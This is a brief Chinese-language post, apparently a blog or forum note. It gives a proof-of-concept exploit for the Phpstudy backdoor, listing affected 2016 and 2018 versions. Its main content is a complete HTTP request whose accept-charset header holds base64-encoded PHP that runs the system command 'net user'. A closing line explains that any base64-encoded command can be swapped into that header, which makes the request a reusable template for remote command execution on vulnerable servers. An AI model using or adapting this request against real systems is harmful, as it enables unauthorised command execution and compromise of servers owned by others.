漏洞版本
Phpstudy 2016版 php-5.4
Phpstudy 2018版 php-5.2.17
Phpstudy 2018版 php-5.4.45
数据包
GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
accept-charset后面的参数base64编码即可
image.png












网友评论